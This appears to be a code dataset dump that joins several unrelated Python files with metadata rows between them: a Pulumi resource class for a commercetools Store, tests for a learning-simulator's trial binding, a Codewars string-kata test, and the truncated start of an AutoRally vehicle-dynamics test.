@property
@pulumi.getter
def key(self) -> pulumi.Input[str]:
"""
User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: pulumi.Input[str]):
pulumi.set(self, "key", value)
@property
@pulumi.getter(name="distributionChannels")
def distribution_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of ResourceIdentifier to a Channel with ProductDistribution
"""
return pulumi.get(self, "distribution_channels")
@distribution_channels.setter
def distribution_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "distribution_channels", value)
@property
@pulumi.getter
def languages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
[IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
"""
return pulumi.get(self, "languages")
@languages.setter
def languages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "languages", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
[LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="supplyChannels")
def supply_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of ResourceIdentifier of Channels with InventorySupply
"""
return pulumi.get(self, "supply_channels")
@supply_channels.setter
def supply_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "supply_channels", value)
@pulumi.input_type
class _StoreState:
def __init__(__self__, *,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[int]] = None):
"""
Input properties used for looking up and filtering Store resources.
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
if distribution_channels is not None:
pulumi.set(__self__, "distribution_channels", distribution_channels)
if key is not None:
pulumi.set(__self__, "key", key)
if languages is not None:
pulumi.set(__self__, "languages", languages)
if name is not None:
pulumi.set(__self__, "name", name)
if supply_channels is not None:
pulumi.set(__self__, "supply_channels", supply_channels)
if version is not None:
pulumi.set(__self__, "version", version)
@property
@pulumi.getter(name="distributionChannels")
def distribution_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of ResourceIdentifier to a Channel with ProductDistribution
"""
return pulumi.get(self, "distribution_channels")
@distribution_channels.setter
def distribution_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "distribution_channels", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def languages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
[IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
"""
return pulumi.get(self, "languages")
@languages.setter
def languages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "languages", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
[LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="supplyChannels")
def supply_channels(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Set of ResourceIdentifier of Channels with InventorySupply
"""
return pulumi.get(self, "supply_channels")
@supply_channels.setter
def supply_channels(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "supply_channels", value)
@property
@pulumi.getter
def version(self) -> Optional[pulumi.Input[int]]:
return pulumi.get(self, "version")
@version.setter
def version(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "version", value)
class Store(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
"""
Create a Store resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: StoreArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Create a Store resource with the given unique name, props, and options.
:param str resource_name: The name of the resource.
:param StoreArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(StoreArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = StoreArgs.__new__(StoreArgs)
__props__.__dict__["distribution_channels"] = distribution_channels
if key is None and not opts.urn:
raise TypeError("Missing required property 'key'")
__props__.__dict__["key"] = key
__props__.__dict__["languages"] = languages
__props__.__dict__["name"] = name
__props__.__dict__["supply_channels"] = supply_channels
__props__.__dict__["version"] = None
super(Store, __self__).__init__(
'commercetools:index/store:Store',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
distribution_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
key: Optional[pulumi.Input[str]] = None,
languages: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[Mapping[str, Any]]] = None,
supply_channels: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
version: Optional[pulumi.Input[int]] = None) -> 'Store':
"""
Get an existing Store resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] distribution_channels: Set of ResourceIdentifier to a Channel with ProductDistribution
:param pulumi.Input[str] key: User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
:param pulumi.Input[Sequence[pulumi.Input[str]]] languages: [IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
:param pulumi.Input[Mapping[str, Any]] name: [LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
:param pulumi.Input[Sequence[pulumi.Input[str]]] supply_channels: Set of ResourceIdentifier of Channels with InventorySupply
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _StoreState.__new__(_StoreState)
__props__.__dict__["distribution_channels"] = distribution_channels
__props__.__dict__["key"] = key
__props__.__dict__["languages"] = languages
__props__.__dict__["name"] = name
__props__.__dict__["supply_channels"] = supply_channels
__props__.__dict__["version"] = version
return Store(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="distributionChannels")
def distribution_channels(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Set of ResourceIdentifier to a Channel with ProductDistribution
"""
return pulumi.get(self, "distribution_channels")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
User-specific unique identifier for the store. The key is mandatory and immutable. It is used to reference the store
"""
return pulumi.get(self, "key")
@property
@pulumi.getter
def languages(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
[IETF Language Tag](https://en.wikipedia.org/wiki/IETF_language_tag)
"""
return pulumi.get(self, "languages")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Mapping[str, Any]]:
"""
[LocalizedString](https://docs.commercetools.com/api/types#localizedstring)
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="supplyChannels")
def supply_channels(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Set of ResourceIdentifier of Channels with InventorySupply
"""
return pulumi.get(self, "supply_channels")
@property
@pulumi.getter
def version(self) -> pulumi.Output[int]:
return pulumi.get(self, "version")
| 45.988732 | 154 | 0.658091 | 1,860 | 16,326 | 5.582258 | 0.084409 | 0.118655 | 0.072811 | 0.093904 | 0.841086 | 0.822113 | 0.788115 | 0.775498 | 0.76423 | 0.754021 | 0 | 0.000079 | 0.22847 | 16,326 | 354 | 155 | 46.118644 | 0.82423 | 0.298787 | 0 | 0.709091 | 1 | 0 | 0.079055 | 0.020461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.159091 | false | 0.004545 | 0.022727 | 0.009091 | 0.277273 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e5a196dedc79316c6fd26504a29a7dbb6e608fc6 | 15,465 | py | Python | tests/test_bind_trials.py | markusrobertjonsson/lesim2 | 05e171dbb7f1f4046b4363083030dfc6195f5a03 | [
"MIT"
] | 7 | 2020-07-14T20:30:23.000Z | 2022-02-14T05:58:22.000Z | tests/test_bind_trials.py | markusrobertjonsson/lesim2 | 05e171dbb7f1f4046b4363083030dfc6195f5a03 | [
"MIT"
] | 107 | 2019-04-12T13:21:08.000Z | 2020-11-16T20:41:53.000Z | tests/test_bind_trials.py | learningsimulator/learningsimulator | 79b00bb0155537a4219637e68d5092fd10a1017f | [
"MIT"
] | 9 | 2019-04-17T19:48:19.000Z | 2020-10-25T20:12:48.000Z | import matplotlib.pyplot as plt
import unittest
from .testutil import run, get_plot_data
class TestNewTrialWithBind(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_wplot(self):
script = '''
n_subjects : 1
mechanism : GA
behaviors : R0, R1, R2
stimulus_elements : S1, S2, reward, reward2
start_v : default:-1
alpha_v : 0.1
alpha_w : 0.1
beta : 1
behavior_cost : R1:1, R2:1, default:0
u : reward:10, default: 0
bind_trials : off
@phase chaining stop:reward=100
NEW_TRIAL S1 | R1: STIMULUS_2 | NEW_TRIAL
STIMULUS_2 S2 | R2: REWARD | NEW_TRIAL
REWARD reward | NEW_TRIAL
@run chaining
xscale: reward
@wplot S1
bind_trials: on
@run chaining
@figure
@wplot S1
'''
script_obj, _ = run(script)
axw = plt.figure(1).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_off = lines[0]
xmin = w_S1_off.get_xdata(True).min(0)
xmax = w_S1_off.get_xdata(True).max(0)
ymin = w_S1_off.get_ydata(True).min(0)
ymax = w_S1_off.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertAlmostEqual(ymax, 8, 2)
axw = plt.figure(2).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_on = lines[0]
xmin = w_S1_on.get_xdata(True).min(0)
xmax = w_S1_on.get_xdata(True).max(0)
ymin = w_S1_on.get_ydata(True).min(0)
ymax = w_S1_on.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertGreater(ymax, 20.0, 1)
self.assertLess(ymax, 30.0, 1)
def test_new_trial_is_help_line(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
# alpha_w : us: 0, none:0, default: 0.05
alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
bind_trials : off
#start_w : 1.42
@phase Both_paired stop: new_trial=10
new_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | new_trial
NONE none | new_trial
@phase Only_CS2_US_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: new_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
# Minimal example of new_trial being help line and xscale:new_trial
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w : 1.4
@phase foo stop: new_trial=4
new_trial | NONE
NONE none | new_trial
@run foo
@figure
xscale: new_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Minimal example of new_trial being help line and xscale:all
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: new_trial=4
new_trial | NONE
NONE none | new_trial
@run foo
@figure
xscale: all
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Add a stimulus to new_trial, and plot will contain one more point
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: new_trial=4
new_trial us | NONE
NONE none | new_trial
@run foo
@figure
xscale: new_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 4)
def test_home_made_bind_off_with_alpha_w(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
alpha_w : us: 0, none:0, default: 0.05
# alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
bind_trials : on
@phase Both_paired stop: new_trial=10
new_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | new_trial
NONE none | new_trial
@phase Only_CS2_US_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: new_trial=10
new_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: new_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
class TestNewTrialWithOmitLearnAction(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
plt.close('all')
def test_wplot(self):
script = '''
n_subjects : 1
mechanism : GA
behaviors : R0, R1, R2
stimulus_elements : S1, S2, reward, reward2
start_v : default:-1
alpha_v : 0.1
alpha_w : 0.1
beta : 1
behavior_cost : R1:1, R2:1, default:0
u : reward:10, default: 0
@phase bind_off stop:reward=100
NJU_TRIAL S1 | R1: STIMULUS_2 | @omit_learn, NJU_TRIAL
STIMULUS_2 S2 | R2: REWARD | @omit_learn, NJU_TRIAL
REWARD reward | @omit_learn, NJU_TRIAL
@phase bind_on stop:reward=100
NJU_TRIAL S1 | R1: STIMULUS_2 | NJU_TRIAL
STIMULUS_2 S2 | R2: REWARD | NJU_TRIAL
REWARD reward | NJU_TRIAL
@run bind_off
xscale: reward
@wplot S1
@run bind_on
@figure
@wplot S1
'''
script_obj, _ = run(script)
axw = plt.figure(1).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_off = lines[0]
xmin = w_S1_off.get_xdata(True).min(0)
xmax = w_S1_off.get_xdata(True).max(0)
ymin = w_S1_off.get_ydata(True).min(0)
ymax = w_S1_off.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertAlmostEqual(ymax, 8, 2)
axw = plt.figure(2).axes
self.assertEqual(len(axw), 1)
axw = axw[0]
lines = axw.get_lines()
self.assertEqual(len(lines), 1)
w_S1_on = lines[0]
xmin = w_S1_on.get_xdata(True).min(0)
xmax = w_S1_on.get_xdata(True).max(0)
ymin = w_S1_on.get_ydata(True).min(0)
ymax = w_S1_on.get_ydata(True).max(0)
self.assertEqual(xmin, 0)
self.assertEqual(xmax, 100)
self.assertLessEqual(ymin, 0)
self.assertGreater(ymax, 20.0, 1)
self.assertLess(ymax, 30.0, 1)
def test_new_trial_is_help_line(self):
script = '''
n_subjects : 25
mechanism : GA
behaviors : cr,ignore # ur = cr, cr1=cr2
stimulus_elements : us,cs1,cs2,none
start_v : default: 0
alpha_v : cs1->ignore: 0.0, cs2->ignore: 0.0, default: 0.05
# alpha_w : us: 0, none:0, default: 0.05
alpha_w : 0.05
beta : 1
behavior_cost : cr:1, default: 0
u : us:5, default: 0
#start_w : 1.42
@phase Both_paired stop: nju_trial=10
nju_trial | CS1(0.5) | NONE
CS1 cs1 | CS2
CS2 cs2 | US
US us | @omit_learn, nju_trial
NONE none | @omit_learn, nju_trial
@phase Only_CS2_US_paired(Both_paired) stop: nju_trial=10
nju_trial | CS1(0.5),CS2(0.5)
CS1 cs1 | NONE
@phase Only_CS1_CS2_paired(Both_paired) stop: nju_trial=10
nju_trial | CS1(0.5),US(0.5)
CS2 cs2 | NONE
@run Both_paired runlabel: Both_paired
@run Only_CS2_US_paired runlabel: Only_CS2_US_paired
@run Only_CS1_CS2_paired runlabel: Only_CS1_CS2_paired
@figure
xscale: nju_trial
subject: average
runlabel: Both_paired
@wplot us {'label':'us_Both_paired'}
@wplot none {'label':'none_Both_paired'}
runlabel: Only_CS2_US_paired
@wplot us {'label':'us_Only_CS2_US_paired'}
@wplot none {'label':'none_Only_CS2_US_paired'}
runlabel: Only_CS1_CS2_paired
@wplot us {'label':'us_Only_CS1_CS2_paired'}
@wplot none {'label':'none_Only_CS1_CS2_paired'}
@legend
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
zeros = [0] * 9
self.assertEqual(plot_data['us_Both_paired']['y'], zeros)
self.assertEqual(plot_data['none_Both_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS2_US_paired']['y'], zeros)
self.assertEqual(plot_data['us_Only_CS1_CS2_paired']['y'], zeros)
self.assertEqual(plot_data['none_Only_CS1_CS2_paired']['y'], zeros)
# Minimal example of new_trial being help line and xscale:new_trial
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w : 1.4
@phase foo stop: nju_trial=4
nju_trial | NONE
NONE none | nju_trial
@run foo
@figure
xscale: nju_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Minimal example of new_trial being help line and xscale:all
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: nju_trial=4
nju_trial | NONE
NONE none | nju_trial
@run foo
@figure
xscale: all
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 3)
# Add a stimulus to new_trial, and plot will contain one more point
plt.close('all')
script = '''
mechanism : GA
behaviors : cr,ignore
stimulus_elements : us,cs1,cs2,none
start_w: 1.4
@phase foo stop: nju_trial=4
nju_trial us | NONE
NONE none | nju_trial
@run foo
@figure
xscale: nju_trial
@wplot us
'''
script_obj, script_output = run(script)
plot_data = get_plot_data()
self.assertEqual(plot_data['y'], [1.4] * 4)
| 33.044872 | 82 | 0.530165 | 1,955 | 15,465 | 3.938619 | 0.070077 | 0.044675 | 0.028052 | 0.046753 | 0.947013 | 0.934675 | 0.931558 | 0.924545 | 0.921558 | 0.91026 | 0 | 0.048949 | 0.372519 | 15,465 | 467 | 83 | 33.115632 | 0.744538 | 0.024766 | 0 | 0.916667 | 0 | 0.007813 | 0.646036 | 0.068657 | 0 | 0 | 0 | 0 | 0.130208 | 1 | 0.023438 | false | 0.005208 | 0.007813 | 0 | 0.036458 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e5dd35d7fc8c304bc0c12c842bde8faab7bba4a8 | 669 | py | Python | Codewars/7kyu/mumbling/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/7kyu/mumbling/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/7kyu/mumbling/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.6.0
Test.describe('accum')
Test.it('Basic tests')
Test.assert_equals(accum('ZpglnRxqenU'), 'Z-Pp-Ggg-Llll-Nnnnn-Rrrrrr-Xxxxxxx-Qqqqqqqq-Eeeeeeeee-Nnnnnnnnnn-Uuuuuuuuuuu')
Test.assert_equals(accum('NyffsGeyylB'), 'N-Yy-Fff-Ffff-Sssss-Gggggg-Eeeeeee-Yyyyyyyy-Yyyyyyyyy-Llllllllll-Bbbbbbbbbbb')
Test.assert_equals(accum('MjtkuBovqrU'), 'M-Jj-Ttt-Kkkk-Uuuuu-Bbbbbb-Ooooooo-Vvvvvvvv-Qqqqqqqqq-Rrrrrrrrrr-Uuuuuuuuuuu')
Test.assert_equals(accum('EvidjUnokmM'), 'E-Vv-Iii-Dddd-Jjjjj-Uuuuuu-Nnnnnnn-Oooooooo-Kkkkkkkkk-Mmmmmmmmmm-Mmmmmmmmmmm')
Test.assert_equals(accum('HbideVbxncC'), 'H-Bb-Iii-Dddd-Eeeee-Vvvvvv-Bbbbbbb-Xxxxxxxx-Nnnnnnnnn-Cccccccccc-Ccccccccccc')
| 66.9 | 120 | 0.802691 | 91 | 669 | 5.846154 | 0.758242 | 0.093985 | 0.150376 | 0.197368 | 0.120301 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004608 | 0.026906 | 669 | 9 | 121 | 74.333333 | 0.812596 | 0.020927 | 0 | 0 | 0 | 0.714286 | 0.690659 | 0.58193 | 0 | 0 | 0 | 0 | 0.714286 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f902bfa153ea825ff137259d95106d3f56feb1e0 | 13,241 | py | Python | neural_clbf/systems/tests/test_autorally.py | MIT-REALM/neural_clbf | 5eda47941aabc6cb4147c618c9fc5b58e1591d67 | [
"BSD-3-Clause"
] | 9 | 2022-01-22T11:47:11.000Z | 2022-03-08T14:49:38.000Z | neural_clbf/systems/tests/test_autorally.py | MIT-REALM/neural_clbf | 5eda47941aabc6cb4147c618c9fc5b58e1591d67 | [
"BSD-3-Clause"
] | 1 | 2021-11-14T22:30:20.000Z | 2021-11-19T14:40:49.000Z | neural_clbf/systems/tests/test_autorally.py | MIT-REALM/neural_clbf | 5eda47941aabc6cb4147c618c9fc5b58e1591d67 | [
"BSD-3-Clause"
] | 5 | 2022-01-23T17:02:52.000Z | 2022-03-29T22:26:59.000Z | """Test the 2D quadrotor dynamics"""
from copy import copy
import matplotlib.pyplot as plt
import tqdm
import numpy as np
import torch
from neural_clbf.systems import AutoRally
def test_autorally_init():
"""Test initialization of AutoRally model"""
# Test instantiation with valid parameters
valid_params = {
"psi_ref": 1.0,
"v_ref": 1.0,
"omega_ref": 0.0,
}
arcar = AutoRally(valid_params)
assert arcar is not None
assert arcar.n_dims == 9
assert arcar.n_controls == 2
def plot_autorally_straight_path():
"""Test the dynamics of the kinematic car tracking a straight path"""
# Create the system
params = {
"psi_ref": 0.5,
"v_ref": 10.0,
"omega_ref": 0.0,
}
dt = 0.001
arcar = AutoRally(params, dt)
upper_u_lim, lower_u_lim = arcar.control_limits
# Simulate!
# (but first make somewhere to save the results)
t_sim = 10.0
n_sims = 1
controller_period = 0.01
num_timesteps = int(t_sim // dt)
start_x = arcar.goal_point.clone()
start_x[:, AutoRally.SYE] = 1.0
start_x[:, AutoRally.SXE] = -1.0
x_sim = torch.zeros(num_timesteps, n_sims, arcar.n_dims).type_as(start_x)
for i in range(n_sims):
x_sim[0, i, :] = start_x
u_sim = torch.zeros(num_timesteps, n_sims, arcar.n_controls).type_as(start_x)
controller_update_freq = int(controller_period / dt)
for tstep in range(1, num_timesteps):
# Get the current state
x_current = x_sim[tstep - 1, :, :]
# Get the control input at the current state if it's time
if tstep == 1 or tstep % controller_update_freq == 0:
u = arcar.u_nominal(x_current)
for dim_idx in range(arcar.n_controls):
u[:, dim_idx] = torch.clamp(
